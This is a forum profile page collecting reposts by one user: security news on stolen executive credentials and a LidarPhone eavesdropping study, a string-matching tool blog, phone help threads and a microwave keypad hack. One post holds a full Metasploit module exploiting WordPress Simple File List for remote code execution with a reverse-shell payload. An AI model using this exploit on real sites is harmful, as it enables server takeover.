-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
ToYaml.com -- Convert between Properties and YAML Online -- v20200619 https://www.toyaml.com/index.html Source
-
Today we are proud of showing the world the first prototype of Big Match, our tool to find open-source libraries in binaries only using their strings. How does it work? Read this post to find out, or head to our demo website to try it out. Spoiler: we are analyzing all the repositories on GitHub and building a search engine on top of that data. Introduction There's a thing that every good reverser does when starting to work on a target: look for interesting strings and throw them into Google hoping to find some open-source or leaked source. This can save you anywhere from few hours of work to several days. It's kind of a poor man's function (or library) matching. In 2018, I decided to try out LINE's Bug Bounty program and so I started reversing a library bundled with the Android version of the App. For those unfamiliar with LINE, it's the most used instant messaging App in Japan. Anyway, there were many useful error strings sprinkled all around my target, so I did exactly that manual googling I've just mentioned. Luckily, I was able to match some strings against Cisco's libsrtp. But little did I know, my target included a modified version of PJSIP, a huge library that does indeed include libsrtp. Unfortunately, I discovered this fact much later, so I wasted an entire week reversing an open-source library. Outline of our approach The way we, at rev.ng, decided to approach this problem is actually simple conceptually, but gets tricky due to the scale of the data we are dealing with. In short, this is the outline of what we did: Get the source code of the top C/C++ repositories on GitHub, where "top" means "most starred". Ideally we would like to analyze all of them, and we will eventually, but we wanted to give priority to famous projects. Deduplicate the repositories: we don't want to have 70k+ slightly different versions of the Linux kernel in our database. Extract the strings: use ripgrep as a quick way to extract strings from source code. De-escape the strings. E.g.: turn '\n' into an actual newline character. Hash the strings. Store them in some kind of database. Query the database using the hashes of the strings from a target binary. Cluster the query results. Where to start The first thing we did was figure out a way to get the list of all the repos on GitHub, sorted by stars. It turns out, however, that this is more easily said than done. GitHub has an official API but it is rate-limited and we wanted to avoid writing a multi-machine crawling system just for that. So we looked around and, among many projects making available GitHub data, we found the amazing GHTorrent. GHTorrent, short for GitHub Torrent, is a project created by Prof. Georgios Gousios of TU Delft. What it does is periodically poll GitHub's public events API and use the information on commits and new repositories to record the history of GitHub. So, for example, if user thebabush pushes some changes to his repository awesome-repo, GHTorrent analyzes those changes and, if the repo is not present in its database, it creates a new entry. It also saves its metadata, e.g. star count, and some of its commits. By exploiting the GitHub REST API, GHTorrent is able to create a somewhat complete relational view of all of GitHub (except for the actual source code): GHTorrent's data is made available as either a MySQL dump of the relational database in the picture or as a series of daily MongoDB dumps. GHTorrent uses Mongo as a caching layer for GitHub's API so that it can avoid making the same API call twice. Once you import the GHTorrent MySQL dumps on your machine, you can quickly get useful information about GitHub using good ol' SQL (e.g.: information about the most popular C/C++ repos is a simple SELECT ... WHERE ... ORDER BY ...). It also contains information about forks and commits, so you have some good data to exploit for the repo deduplication we want to do. However, GHTorrent is best-effort by design, so you'll never have a complete and consistent snapshot of GitHub. For example, some repos might be missing or have outdated metadata. Another example is that commits information is partial: GHTorrent cannot possibly associate every commit to every repository containing it. Think about the Linux kernel: one commit would need to be added to 70k+ forks and that kind of things doesn't scale very well. Finally, there's another risk regarding the use of a project like GHTorrent: maintenance. Keeping a crawler working costs money and time, and it seems like in the last couple of years they haven't been releasing MySQL dumps that often anymore. On the other hand, they still release their incremental Mongo updates daily. Since they create the MySQL DB using REST API calls that are cached through MongoDB, those incremental updates should be everything you need to recreate their MySQL database. A fun fact is that Microsoft used to sponsor GHTorrent, but I guess they don't need to do it now. And yes, that's not a good thing for us. In the end, since we don't actually need all the tables provided by the GHTorrent MySQL dump, we decided to write a script that directly consumes their Mongo dumps one by one and outputs the information we need into a bunch of text files. In fact, most of our pipeline is implemented using bash scripts (you can read more in our future blogpost about what we like to call bashML). Repository deduplication We mentioned in the outline that we need to deduplicate the repositories. We need to do that for several reasons: As stated earlier, we don't want to download every single fork of every single famous project out there. Duplicated data means that our database of repos grows very fast in size. The first ~100K repos we downloaded from GitHub amount to ~1.4TB of gzip'd source code (without git history), so you can see why this is an important point. Duplicated data is bad for search results accuracy. GHTorrent has information about forks but, as for GitHub itself, that only counts forks created with the "Fork" button on the web UI. The other option is to look for common commits between repositories. If we had infinite computing resources, we would do this: Clone every repository we care about. Put every commit hash in a graph database of some kind. Connect commit hashes using their parent/child relationship. Find the root commits. For every root commit, keep only the most-starred repo. However, we live in the real world, so this is simply impossible for us to do. We would like to have a strategy to deduplicate repos before cloning them, as cloning would require a lot of time and bandwidth. On top of that, when using git you can merge the history of totally-unrelated projects. So, if you deduplicate repos based on the root commit alone, you end up removing a lot of projects you actually want to keep. Case in point: octocat/Spoon-Knife. octocat/Spoon-Knife is the most forked project on GitHub, and there's a reason for that: it's the repo that is used in GitHub's tutorial on forking. This means that a lot of people learning to use GitHub have forked this repo at some point. You might be wondering why Spoon-Knife causes troubles to our theoretical deduplication algorithm. Well, take a look at this screenshot of LibreCAD's git history: At some point in the past some user by the name of youarefunny was learning to use GitHub and so he forked Spoon-Knife. At some other point, he forked LibreCAD and made some commits. Then, for whatever reason, he thought "well, why not merge the history of these two nice repositories in a single one? So we can have a branch with the history of both projects!". And finally, just to fuck with us contribute to a useful open-source project like LibreCAD, he decided to open a pull request using that exact branch. And that pull request was accepted. TL;DR: the history of Spoon-Knife is included in LibreCAD's repo. If you want to check this out, visit this link or clone LibreCAD/LibreCAD and run git diff f08a37f282dd30ce7cb759d6cf8981c982290170. Things like this present a serious issue for us because Spoon-Knife has 10.3k stars at the moment, while LibreCAD only has 2k. Which means that if we were to remove the least starred project, we would actually remove LibreCAD and keep the utterly useless Spoon-Knife repo. I hate you yourefunny. And no, you are not actually funny. But yourefunny is not alone in this: during our tests we've found that some people also like to merge the history of Linux and LLVM. Go figure. Best-effort deduplication So we can't git clone every repo on GitHub and we can't do root-based deduplication. What we can do is use GHTorrent once again and implement a different strategy. In fact, GHTorrent has information about commits, too, albeit limited. This is what it gives us: (partial) (parent commit, child commit) relations. (partial) (commit, repository) relations. Exploiting this data we can't reconstruct the full git history of every repository, but we can recreate subgraphs of it. We then apply this algorithm: Find a commit for which GHTorrent doesn't have a parent (we call them parentless commits) and consider it a root commit. Explore the commit history graph starting at a root commit. We do this going upward, that is, only following parent → child edges. We group all the repositories associated with the commits of a subgraph we obtain in step 2. We call such group a repository group. For every repository group, we find the most starred repo it contains and consider it the parent repo, while we consider the others the children repos. We now have several (parent repo, child repo) relations. We do all the previous steps for all the commits data in GHTorrent and obtain a huge graph of repositories related by has_parent relations. We take all the repositories without parents and consider them unique repos. In other words, we will not crawl repos for which we have a parent. This is easier shown than explained, so let's start with the following example git history graph: We have 5 commits (A, B, C, D and E), related by is_parent relations, and for each commit we have data on which repos contain them. We have 2 root commits, A and E, and for each of them we perform step 2 and 3 to create their repository groups: You can see that we get groups Group 1 and Group 2. We then take every group, together with the star counts of its repos, and create a partial repository graph. For example, if we take Group 2 from above, we get this: repo4 is the repo with the most stars in Group 2, so we assume that the other repos in the group are forked from it. By joining all the partial repository graphs we extract from all the groups we've found, we get the full repository graph: We can now take the repositories without a parent and consider them as deduplicated repos. In other words, we will only crawl the repositories marked in red in the picture. This is pretty much how we try to deduplicate repositories prior to cloning them. Now, before you write us angry comments: we know this is not perfect, but it works and is a good trade-off between deduplicating too much and not deduplicating at all. From source code to string hashes After crawling the repos resulting from the previous step, we need to analyze their C/C++ files to extract the strings inside them. Parsing C/C++ files is non-trivial due to macros, include files, and all those C magic goodies. In this first iteration of Big Match we wanted to be fast and favoured a simple approach: using grep (actually, ripgrep). So yeah, we just grep for single-line string literals and store them in a txt file. Then, we take every string from the file and de-escape it so special characters like '\n' are converted to the real ascii character they represent. We do this because, of course, once strings pass through the compiler and end up in the final binary, they are not escaped anymore, so we try to emulate that process. Finally, we hash the strings and store the hex-coded hashes, again, in a txt file. This is nice because we end up with 3 files per repo: A tarball with its source code. A txt file with its strings. A txt file with its hashes (<repo_name>.hashes.txt) If you are wondering why we like txt files so much, be sure to read the next section. Polishing the data As said above, our repository analysis pipeline leaves us with many <repo_name>.hashes.txt files containing all the hex-coded hashes of the strings in a repository. It's now time to turn those files into something that we can use to build a search engine. Search engine 101 A lot of modern search engines include some kind of vector space model. This is a fancy way to say that they represent a document as a vector of words. For example: txt_0 = "hello world my name is babush" txt_1 = "good morning babush" # once encoded, it becomes: doc_0 = [ 1, # hello 1, # world 1, # my 1, # name 1, # is 1, # babush 0, # good 0, # morning ] doc_1 = [ 0, # hello 0, # world 0, # my 0, # name 0, # is 1, # babush 1, # good 1, # morning ] There are many flavours of vector space models, but the main point is that instead of just using a boolean value for the words, one can use word counts or some weighting scheme like tf-idf (more on this later). What does the vector space model have to do with Big Match? Just swap repositories for documents and string hashes for words and you've got a model for building a repository search engine. And, instead of querying using a sequence of words, you just use a vector of string hashes like they were a new repository. In our case, we decided not to count the number of times a string is present in a repository, so we just need to put a 1 if a string is present in a repo and then apply some weighting formula to tell the model that some strings are more important than others. Now, how do you turn a bunch of txt files into a set of vectors? Enter bashML. You will read about it in another article on our blog, but the main point is that we can do everything using just bash scripts by piping coreutils programs. A picture is worth a million words, so enjoy this visualization of a part of our bash pipeline (created with our internal tool pipedream😞 Algorithms and parameter estimation The next step was to evaluate the best algorithms for weighting the strings in our repos/vectors. For this, we created an artificial dataset using strings on libraries we compiled ourselves (thanks Gentoo). Without going into the details, it turns out that tf-idf weighting and simple cosine similarity work very well for our problem. For those of you unfamiliar with these terms: Tf-idf is a very common weighting scheme that considers both the popularity of the words in a document (in our case, string hashes in a repo) and the size of the documents (in our case, repositories). In tf-idf, popular words are penalized because it is assumed that common words convey less information than rare ones. Similarly, short documents are considered more informative than long documents, as the latters tend to match more often just because they contain more words. Cosine similarity, also very common, is one of the many metrics one can use to calculate the distance between vectors. Specifically, it measures the angle between a pair of N-dimensional vectors: a similarity next to 1 means a small angle, while a value close to 0 means the vectors are orthogonal. Long story short: scoring boils down to calculating the cosine distance between a given repo and the set of hashes in input (both weighted using tf-idf). We also wanted to study whether removing the top-K most common strings could improve the results of a query. Our intuition was that very frequent strings like "error" aren't very useful in disambiguating repositories. In fact, removing the most common strings did improve our results: cutting around K = 10k seemed to give the best score. After some plotting around, we increased our confidence in that magic number: Note: both axes use a logarithmic scale. You can easily see that the first ~10k most frequent strings (on the left of the red line) are very popular, then there's a somewhat flat area, and finally an area of infrequent strings on the right. The graph, together with our tests, confirms that keeping the strings that are too popular actually makes the query results worse. At this point, due to the big number of near-duplicates still present in our database, the repo similarity scores looked like this: $ strings /path/to/target | ./query.sh 0.95 repoA 0.94 repoA-fork1 0.92 repoA-fork2 0.91 repoA-fork3 ... 0.60 repoB 0.59 repoB-fork1 0.57 repoB-fork3 0.52 library-with-repoB-sourcecode-inside ... This is a huge problem because it means that if we just show the top-K repositories that have the highest similarity to our query, they are mostly different versions of the same repo. If there are two repos inside our binary, for example zlib and libssl, one of the two would be buried deep down in the results due to the many zlib or libssl versions out there. On top of that, developers often just copy zlib or libssl source code in their repos to have all dependencies ready on clone. For these reasons we wanted to cluster the search results. We once again used our artificial Gentoo dataset, plus some manual result evaluation, and ended up choosing spectral co-clustering as our clustering algorithm. We also plotted the clustered results and they looked pretty pretty nice: On the x-axis you have the strings that match our example query while on the y-axis you have the repositories matching at least one string hash. A red pixel means that the repo y contains string x. The blue lines are just to mark the different repository clusters. Due to the nature of spectral co-clustering, the more the plot looks like a block diagonal matrix, the better the clustering results are. It's interesting to note that strings plus clustering are good enough to visually identify similar repositories. One might also be able to use strings to guess if a repository is wholly contained into a bigger one (once again, think of something like zlib inside the repo of an image compression program). Putting it into production Putting everything we have shown into a working search engine is just a matter of loading all the repo vectors into a huge (sparse) matrix and wait for a query vector from the user. By query vector we mean that, once the user gives us a set of strings to search in Big Match, we encode them in a vector using the encoding scheme we've shown earlier. Since we use tf-idf and normalize properly, a matrix multiplication is all we need to score every repository against the query: where After that we just need to use the scores to find the best-matching repositories, cluster them using their rows in the big matrix, and show everything to the user. But don't take our word for it, try our amazing web demo. A second deduplication step When we tried out our pipeline for the first time, the average amount of RAM required to store a repo vector was around 40kB. That's not too much, but we plan to have most of GitHub C/C++ repos in memory so we wanted to decrease it even more. Since we use a sparse matrix, memory consumption is proportional to the number of elements we store, where an element is stored iff . In order to get a better insight into our initial dataset, we plotted the top-10k repos with the most strings to look at their string distribution: The average string count, 23k, is shown in red in the picture. We also marked in green the position of a repository with ~23k strings, which is basically the repo with average string count. It follows that if we sum everything on the left of the green line we get (almost) the same number that we get if we sum everything on the right. In other words, the area under the blue curve (in the complete, uncropped plot) is divided evenly by the green line. If we keep in mind that at this point the dataset was made out of ~60k repositories, this means that the top-5k biggest repos occupied as much RAM as the remaining ~55k repos. By looking at the plot we are able to say that if we are able to better deduplicate the most expensive (memory-wise) repositories we should be able to lower the average amount of memory-per-repository by quite a bit. In case you are wondering what those projects are, they are mostly Android or plain Linux kernels that are dumped on GitHub as a single commit, so they bypass our first deduplication pass. Since at this point we have the source code of every repository that passed through the first deduplication phase, we can apply a second, more expensive, content-aware deduplication to try to improve the situation. For this, we wrote a bash script that computes the Jaccard similarity of the biggest repositories in our dataset and, given two very similar projects, only keeps the most-starred one. By using this method we are able to succesfully deduplicate a lot of big repositories and decrease RAM usage significantly. Pros and cons Time to talk about the good and the bad of this first iteration of Big Match. Pros: Perfect string-matching works surprisingly well. Privacy: if a hash doesn't match, we don't know what string it represents. Cons: We get relevant results only for binaries with a decent amount of strings. At the moment, we only do perfect matching: in the future we want to support partial matches Query speed is good enough but we need to make it faster as we scale up our database. Using strings is sub-optimal: a proper decompiler-driven string extraction algorithm would be able to exploit, for example, pointers in the binary to better understand where strings actually start (strings is limited to very simple heuristics). So, instead of picking up strings with wrong prefixes like "XRWFHello World", we would be able to extract the actual string "Hello World". Conclusion Gone are the days of me reversers wasting weeks reversing open source libraries embedded in their targets. Ok, maybe not yet, but we made a big step towards that goal and, while quite happy with the results of Big Match v1, we are already planning for the next iteration of the project. First of all, we want to integrate Big Match with our decompiler. Then, we want to add partial strings matching and introduce support for magic numbers/arrays (think well-known constants like file format headers or cryptographic constants). We also want to test whether strings and constants can be reliably used to guess the exact version of a library embedded in a binary (if you have access to a library's git history, you can search for the commit that results in the best string matches). In the mean time, we need to battle-test Big Match's engine and scale the size of our database so that we can provide more value to the users. Finally, it would be interesting to add to our database strings taken directly from binaries for which there are no sources available (e.g.: firmware, malware, etc...). One again, if you haven't done it already, go check out our Big Match demo and tell us what you think. Until then, babush Source
-
Salut, cum se poate recupera un telefon (Smartphone 2020), in caz de furt/etc... hard reset; Cloud: exclus, imeipro.info: exclus, fingerprint: exclus, facial recognition: exclus. Alte metode? Multumesc!
-
Access is sold for $100 to $1500 per account, depending on the company size and exec role. Image: Ryoji Iwata A threat actor is currently selling passwords for the email accounts of hundreds of C-level executives at companies across the world. The data is being sold on a closed-access underground forum for Russian-speaking hackers named Exploit.in, ZDNet has learned this week. The threat actor is selling email and password combinations for Office 365 and Microsoft accounts, which he claims are owned by high-level executives occupying functions such as: CEO - chief executive officer COO - chief operating officer CFO - chief financial officer or chief financial controller CMO - chief marketing officer CTOs - chief technology officer President Vice president Executive Assistant Finance Manager Accountant Director Finance Director Financial Controller Accounts Payables Access to any of these accounts is sold for prices ranging from $100 to $1,500, depending on the company size and user's role. The seller's ad on Exploit.in Image via KELA A source in the cyber-security community who agreed to contact the seller to obtain samples has confirmed the validity of the data and obtained valid credentials for two accounts, the CEO of a US medium-sized software company and the CFO of an EU-based retail store chain. The source, which requested that ZDNet not use its name, is in the process of notifying the two companies, but also two other companies for which the seller published account passwords as public proof that they had valid data to sell. These were login details for an executive at a UK business management consulting agency and for the president of a US apparel and accessories maker. Sample login provided by the seller as public proof Image via KELA The seller refused to share how he obtained the login credentials but said he had hundreds more to sell. According to data provided by threat intelligence firm KELA, the same threat actor had previously expressed interest in buying "Azor logs," a term that refers to data collected from computers infected with the AzorUlt info-stealer trojan. Infostealer logs almost always contain usernames and passwords that the trojan extracts from browsers found installed on infected hosts. This data is often collected by the infostealer operators, who filter and organize it, and then put it on sale on dedicated markets like Genesis, on hacking forums, or they sell it to other cybercrime gangs. But, most likely, the compromised emails will be bought and abused for CEO scams, also known as BEC scams. According to an FBI report this year, BEC scams were, by far, the most popular form of cybercrime in 2019, having accounted for half of the cybercrime losses reported last year. The easiest way of preventing hackers from monetizing any type of stolen credentials is to use a two-step verification (2SV) or two-factor authentication (2FA) solution for your online accounts. Even if hackers manage to steal login details, they will be useless without the proper 2SV/2FA additional verifier. Via zdnet.com
-
- 1
-
^ :)) Killuminatii power On: Il returnez, in 30 de zile, nu cred ca factory reset, sa nu pierd garantia
-
pouch, cover, bag, nu m-ai clarificat cu punctul 5, este ceva nou din data de 21 astept sa se faca update sau ii fac downgrade, mersi oricum
-
^ Multumesc pentru rãspuns, este un 0day pe versiunea mea de Android. citesc ce este in ToS. ^ ^ ^ Ce imi plac baieteii ca tine, care se buCURă de problemele altora, va cam place cu balonul, din fericire pentru voi este faptul ca va bucurati din spatele tastaturii.
-
Nu e man, are magneti "coperta" . telefonul este cumparat dintr-un super-market din Ro. (Nu este chinezarie)
-
Salut, am primit recent un smartphone, nou, sigilat, QuadCore, atasat cu husâ gen "copertã de carte". Nu am instalat absolut nimic pe el, display-ul se misca intr-un mod de lasã de dorit (slow motion), uneori. Am detașat porcaria de husã, mai face nazuri, dar mai rar. Este posibil sã se fi afectat ceva circuite? Are maxim 7-10 zile de când a purtat "coperta" . Îl trimit in service? (are garanție). Multumesc.
-
quiver is a modern, graphical editor for commutative and pasting diagrams, capable of rendering high-quality diagrams for screen viewing, and exporting to LaTeX via tikz-cd. Creating and modifying diagrams with quiver is orders of magnitude faster than writing the equivalent LaTeX by hand and, with a little experience, competes with pen-and-paper. Try quiver out: q.uiver.app Features & screenshots quiver features an efficient, intuitive interface for creating complex commutative diagrams and pasting diagrams. It's easy to draw diagrams involving pullbacks and pushouts, adjunctions, and higher cells. Object placement is based on a flexible grid that resizes according to the size of the labels. There is a wide range of composable arrow styles. quiver is intended to look good for screenshots, as well as to export LaTeX that looks as close as possible to the original diagram. Diagrams may be created and modified using either the mouse, by clicking and dragging, or using the keyboard, with a complete set of keyboard shortcuts for performing any action. When you export diagrams to LaTeX, quiver will embed a link to the diagram, which will allow you to return to it later if you decide it needs to be modified, or to share it with others. Other features Multiple selection, making mass changes easy and fast. A history system, allowing you to undo/redo actions. Support for custom macro definitions: simply paste a URL corresponding to the file containing your \newcommands. Panning and zooming, for large diagrams. Smart label alignment and edge offset. Building Make sure you have installed yarn and have a version of make that supports .ONESHELL (e.g. GNU Make 3.82). Clone the repository, and run make which will build KaTeX. Then simply open src/index.html in your favourite web browser. If you have any problems building quiver, open an issue detailing the problem and I'll try to help. Thanks to S. C. Steenkamp , for helpful discussions regarding the aesthetic rendering of arrows. AndréC for the custom TikZ style for curves of a fixed height. Everyone who has improved quiver by reporting issues or suggesting improvements. Download quiver-master.zip or git clone https://github.com/varkor/quiver.git Source
-
- 2
-
This Metasploit module exploits WordPress Simple File List plugin versions prior to 4.2.3, which allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed to php and executed. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress Simple File List Unauthenticated Remote Code Execution', 'Description' => %q{ Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed to php and executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'coiffeur', # initial discovery and PoC 'h00die', # msf module ], 'References' => [ [ 'URL', 'https://wpscan.com/vulnerability/10192' ], [ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ], [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ], [ 'EDB', '48349' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Default', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-04-27', 'DefaultTarget' => 0, 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), ] ) end def dir_path '/wp-content/uploads/simple-file-list/' end def upload_path '/wp-content/plugins/simple-file-list/ee-upload-engine.php' end def move_path '/wp-content/plugins/simple-file-list/ee-file-engine.php' end def upload(filename) print_status('Attempting to upload the PHP payload as a PNG file') now = Date.today.to_time.to_i.to_s data = Rex::MIME::Message.new data.add_part('1', nil, nil, 'form-data; name="eeSFL_ID"') data.add_part(dir_path, nil, nil, 'form-data; name="eeSFL_FileUploadDir"') data.add_part(now, nil, nil, 'form-data; name="eeSFL_Timestamp"') data.add_part(Digest::MD5.hexdigest("unique_salt#{now}"), nil, nil, 'form-data; name="eeSFL_Token"') data.add_part("#{payload.encoded}\n", 'image/png', nil, "form-data; name=\"file\"; filename=\"#{filename}.png\"") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, upload_path), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 # the server will respond with a 200, but if the timestamp and token dont match it wont give back SUCCESS as it failed fail_with(Failure::UnexpectedReply, "#{peer} - File failed to upload") unless res.body.include?('SUCCESS') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.png"), 'method' => 'GET' ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res # 404 could be AV got it or something similar fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}. File was uploaded successfully, but could not be found.") if res.code == 404 fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 print_good('PNG payload successfully uploaded') end def rename(filename) print_status("Attempting to rename #{filename}.png to #{filename}.php") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, move_path), 'method' => 'POST', 'vars_post' => { 'eeSFL_ID' => 1, 'eeFileOld' => "#{filename}.png", 'eeListFolder' => '/', 'eeFileAction' => "Rename|#{filename}.php" } ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 print_good("Successfully renamed #{filename}.png to #{filename}.php") end def check return CheckCode::Unknown unless wordpress_and_online? # check the plugin version from readme check_plugin_version_from_readme('simple-file-list', '4.2.3', '1.0.1') end def exploit # filename of the file to be uploaded/created filename = Rex::Text.rand_text_alphanumeric(8) register_file_for_cleanup("#{filename}.php") upload(filename) rename(filename) print_status('Triggering shell') send_request_cgi( 'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.php"), 'method' => 'GET' ) end end Source
-
Metoda prin care au fost golite conturile vedetelor din România.
Kev replied to KtLN's topic in Stiri securitate
Nu am citit articolul complet, insa de obicei "bombardierii cu bemveuri" se "combina" cu fetele operatoare dragute si,... au acces in sistem. -
Researchers have unveiled an attack that allows attackers to eavesdrop on homeowners inside their homes, through the LiDAR sensors on their robot vacuums. Researchers have uncovered a new attack that lets bad actors snoop in on homeowners’ private conversations – through their robot vacuums. The vacuums, which utilize smart sensors in order to autonomously operate, have gained traction over the past few years. The attack, called “LidarPhone” by researchers, in particular targets vacuums with LiDAR sensors, as the name suggests. LiDAR, which stands for Light Detection and Ranging, is a remote sensing method that uses light in the form of a pulsed laser to measure distances to or from nearby objects. The technology helps vacuums navigate around obstacles on the floor while they clean. The good news is that the attack is complex: Attackers would need to have already compromised the device itself (in their attack, researchers utilized a previously discovered attack on the vacuum cleaners). Additionally, attackers would need to be on the victim’s local network to launch the attack. Threatpost has reached out to the researchers for further information on the specific equipment utilized to launch the attack, as well as the complexity of the attack; and will update this article accordingly. The core idea behind the attack is to remotely access the vacuum cleaner’s LiDAR readings, and analyze the sound signals collected. This would allow an attacker to listen in on private conversations, said researchers – which could reveal their credit-card data or deliver potentially incriminating information that could be used for blackmail. Researchers were able to LidarPhone on a Xiaomi Roborock vacuum cleaning robot as a proof of concept (PoC). First, they reverse-engineered the ARM Cortex-M based firmware of the robot. They then leveraged an issue in the Dustcloud software stack, which is a proxy or endpoint server for devices, in order to gain root access to the system. That’s an attack based on prior research released at DEFCON 26 in 2018. The robot vacuum attack. Credit: National University of Singapore Then, researchers collected both spoken digits – along with music played by a computer speaker and a TV sound bar – totaling more than 30,000 utterances over 19 hours of recorded audio. They said that LidarPhone achieves approximately 91 percent and 90 percent average accuracies of digit and music classifications, respectively. For instance, researchers were able to detect different sounds around the household – from a cloth rug, to the trash, to various intro music sequences for popular news channels on TV like FOX, CNN and PBS – even predicting the gender of those who were talking. At the same time, various setbacks still exist with the attack. For one, several conditions in the household could render an attack less effective. For instance, the distance away from the vacuum cleaner, and volume, of different noises has an impact on the overall effectiveness. Background noise levels and lighting conditions also have an impact on the attack. Researchers said that the attack can be mitigated by reducing the signal-to-noise ratio (SNR) of the LiDAR signal: “This may be possible if the robot vacuum-cleaner LiDARs are manufactured with a hardware interlock, such that its lasers cannot be transmitted below a certain rotation rate, with no option to override this feature in software,” they said. Regardless, the attack serves as an important reminder that the proliferation of smart sensing devices in our homes opens up many opportunities for acoustic side-channel attacks on private conversations. Via threatpost.com
- 1 reply
-
- 1
-
Image cisa.gov On September 30, 2020, the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center released a joint Ransomware Guide, which is a customer centered, one-stop resource with best practices and ways to prevent, protect and/or respond to a ransomware attack. CISA and MS-ISAC are distributing this guide to inform and enhance network defense and reduce exposure to a ransomware attack: This Ransomware Guide includes two resources: Part 1: Ransomware Prevention Best Practices Part 2: Ransomware Response Checklist Download: https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf Source
- 1 reply
-
- 1
-
Nu stiu ce mananci tu stricat de faci atat off-topic/troll la asta ma am facut referire
-
Mechanical keyboards are all the rage these days! People love the satisfying tactile sensation, and some go on great lengths to customise them to their exact liking. That begs the question: If we love it that much, why stop at just computer keyboards? If you think about it, there are plenty of everyday input devices in desperate need of mech-ing up! For example... a microwave keypad?? Yep you heard that right! Here is the story of how I added a RGB OLED hot-swap mechanical keypad to create the most pimped-up microwave in the entire world! Click me for high-res video with sound! Background A year ago, I picked up a used microwave for £5 at a carboot sale. It was a "Proline Micro Chef ST44": It appears to be from early 2000s, and is pretty unremarkable in every way. But it was cheap and it works, so good enough for me! Problem! That is, until almost exactly a year later. I pressed the usual buttons to heat up my meal, but nothing happened. After the initial disbelief, my thorough investigation by randomly prodding buttons revealed that the membrane keypad is likely broken. At first a few buttons still worked, but soon all the buttons stopped responding. At this point I could have just chucked it and still got my money's worth. But it seemed like a waste just because a cheap plastic keypad failed. Plus I could save a few pounds if I fixed it instead of buying a new one. So I took it apart and see if there was anything I could do. Disassembly After removing the case, we can see the main circuit board: Microcontroller at top-middle Buzzer at top-right Blue ribbon connector for keypad at middle-left Transformer and control relays near the bottom Entire board is through-hole, but I guess if it works it works! Here is the front side: The board is well marked, and it's interesting to see it uses a Vacuum Fluorescent Display (VFD), which was already falling out of favour by the time this was made. I also noticed this board, and in fact everything inside, was designed by Daewoo, a Korean conglomerate making everything from cars to, well, this. Anyway, back to the matter at hand. I thought I could just clean up the ribbon cable contacts and call it a day. Except I didn't notice the contacts were made from carbon(graphite?) instead of the usual metal, and I rubbed some right off: So if it wasn't broken then, it's definitely broken now. Great job! Enter the Matrix (Scanning) Still, it wasn't the end of the world. The keypad almost certainly uses Matrix Scanning to interface with the controller. There is a detailed introduction of this topic on Sparkfun. But in short, matrix scanning allows us to read a large number of inputs from limited number of controller pins. For example, there are more than 100 keys on our computer keyboard. If we simply connect each key to an input pin, the controller chip will need to have more than 100 pins! It will be bulky, difficult to route, and expensive to produce. Instead, with a little cleverness in the firmware, we can arrange the buttons in a grid of columns and rows, AKA a matrix, like this: This way, by scanning a single row and column at a time, we can determine which key(s) are pressed. Of course there are a lot more technicalities, so read more here if you want. Anyway, in the example above, instead of 4 * 4 = 16 pins, we only need 4 + 4 = 8 pins, a saving of half! And with our computer keyboard, we will only need around 20 pins instead of more than 100! Thus, we can see that Matrix Scanning simplifies the pin count and design complexity of input devices. Figuring Out the Matrix Back to our microwave keypad at hand. We can see its ribbon cable comes in two parts, each with 5 pins: So if my assumptions are correct, it would be a 5x5 matrix with 25 buttons. If you scroll all the way back up, you'll find the keypad has 24 buttons, so it checks out! Now we know there are 5 columns and 5 rows, it's time to figure out which key is which. To do that, I desoldered the ribbon cable connector and replaced it with a straight male header: As a side note, the microcontroller is a TMP47C412AN designed by Toshiba. It is a 4-bit processor with 4KB of ROM and 128 Bytes of RAM. It can also directly drive Vacuum Fluorescent Tubes. So all in all, a very specialised chip for appliances. Very underpowered compared to Arduinos and STM32s. But still, it gets the job done! I connected some jumper wires: And labeled the rows and columns with 1-5 and A-E: I then put the board back, powered on, and touched each pair of wires to see which button it responds as. It took a while, but eventually I figured out the matrix location of the buttons I need: So all in all, 10 numpad keys and 4 control buttons. There are a bunch of other buttons, but I didn't bother since I don't use them anyway. I quickly whipped up a simple schematic: With that, I hard-wired some buttons on a perf board as a quick and dirty fix: It works! At least I'll have hot meals now! And it didn't cost me a 